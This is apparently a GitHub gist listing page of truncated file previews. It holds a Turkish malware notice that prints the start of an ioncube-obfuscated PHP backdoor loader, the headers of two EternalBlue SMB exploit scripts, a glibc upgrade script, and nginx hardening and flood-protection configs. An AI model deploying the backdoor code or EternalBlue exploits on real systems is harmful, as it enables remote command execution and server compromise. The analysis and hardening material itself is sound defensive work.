This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # * Şubat ayında keşfedilen ioncube ile gizlenmiş yeni bir malware tespit edildi. | |
| # * Genellikle eval üzerinden işlem yapan bu script, sistemler ve kullanıcılar tarafından oldukça zor bir şekilde tespit edilebiliyor. | |
| # * Sunucu'da root yetkisinde istediği komutu çalıştırmak için kötü niyetli kişiler, benzersiz bir kimliğe sahip ioncube şifrelemesi ile | |
| # * evalden faydalanarak istedikleri komutları çalıştırabilecek bir zararlı ortaya çıkarıyorlar. Bu zararlının kaynağı ioncube olduğu için | |
| # * sistemler tarafından imza tanımlanmaması durumunda tespit edilemiyor. Özellikle CMS sistemler hedef alınıyor. | |
| # * Genellikle kullanılan dosyalar menu.php - ini.php - diff98.php - wrgcduzk.php | |
| <?php //00037a | |
| if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @f |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
kanibaspinar
/ eternalblue2012.py
Created
May 17, 2017 22:20
EternalBlue Windows 8 & Server 2012 - Bypass Windows 10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Glibc 2.12 sürüm stabilizesi açısından bir çok yazılımsal açık ve performans kaybına neden olmaktadır. | |
| #Bu yüzden 2.14 sürümüne geçiş yapmak sistem sağlığı açısından daha performanslı ve stabil bir altyapıya sahip olmanızı sağlar. | |
| mkdir ~/glibc_install; cd ~/glibc_install | |
| wget http://ftp.gnu.org/gnu/glibc/glibc-2.14.tar.gz | |
| tar zxvf glibc-2.14.tar.gz | |
| cd glibc-2.14 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Please do not use http2 integration with nginx. Available in http and server ranges. | |
| # Bu ayarları http2 etkin edilmeden kullanmayın. Aksi durumda performans ve erişim sorunları yaşarsınız. | |
| http2_chunk_size 8k; | |
| http2_body_preread_size 64k; | |
| http2_idle_timeout 3m; | |
| http2_max_concurrent_streams 128; | |
| http2_max_header_size 16k; | |
| http2_max_field_size 4k; | |
| http2_recv_buffer_size 256k; | |
| http2_max_requests 100000; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Bu kuralları bilgi dahilinde entegre etmelisiniz. | |
| # Bu kurallar sayesinde uzantısı eklenen dosyalara doğrudan erişimleri dışardan bağlantı denemelerini tamamen engelliyoruz. | |
| location ~* /\.(?!well-known\/) { | |
| deny all; | |
| } | |
| # uzantısı yer alan türlere doğrudan bağlantıyı engelleyelim | |
| location ~* (?:\.(?:bak|conf|dist|fla|in[ci]|log|psd|sh|sql|sw[op])|~)$ { | |
| deny all; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nginx SPDY Protokolleri | |
| # Bu kurallar HTTPS olmadan çalışmaz | |
| # SPDY Protokolünü aktif et | |
| add_header Alternate-Protocol 443:npn-spdy/3; | |
| # SPDY protokülündeki ziyaretçileri odakla: | |
| spdy_keepalive_timeout 300s; # 180s varsayılan ayardır | |
| # SPDY üst kısım sıkıştırmasını aktif et |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Cpanel Servislerinin rahat calısması için# | |
| location ~* ^/(controlpanel|cpanel|kpanel|securecontrolpanel|securecpanel|securewhm|webmail|whm|bandwidth|img-sys|java-sys|mailman/archives|pipermail|sys_cpanel|cgi-sys|mailman) { | |
| proxy_pass http://server-ip:9999; | |
| proxy_set_header Host $host; | |
| proxy_set_header X-Real-IP $remote_addr; | |
| proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; | |
| } | |
| #KBSP Cpanel Servislerinin rahat çalışması için# |
kanibaspinar
/ wordpress.conf
Created
June 18, 2016 09:11
Wordpress security and performance optimization with Nginx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Please create a file folder named wordpress.conf in /etc/nginx/conf.d insert into these codes## | |
| # Common deny or internal locations, to help prevent access to not-public areas | |
| location ~* wp-admin/includes { deny all; } | |
| location ~* wp-includes/theme-compat/ { deny all; } | |
| location ~* wp-includes/js/tinymce/langs/.*\.php { deny all; } | |
| location /wp-content/ { internal; } | |
| location /wp-includes/ { internal; } | |
| location ~ /(\.|wp-config.php|readme.html|license.txt) { deny all; } | |
| # Add trailing slash to */wp-admin requests. |
kanibaspinar
/ default.conf
Created
June 15, 2016 18:07
Prevention of new types of Http Get Flood attacks at Layer 7 with nginx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Hello provide protection for these settings http get flood attacks. | |
| # Please add this rule to the appropriate sections in your default.conf file. | |
| # Please note that the server {} function does not take place in part become invalid | |
| # | |
| set $add 1; | |
| set $ban ''; | |
| ###### Rule 1 ######## |
NewerOlder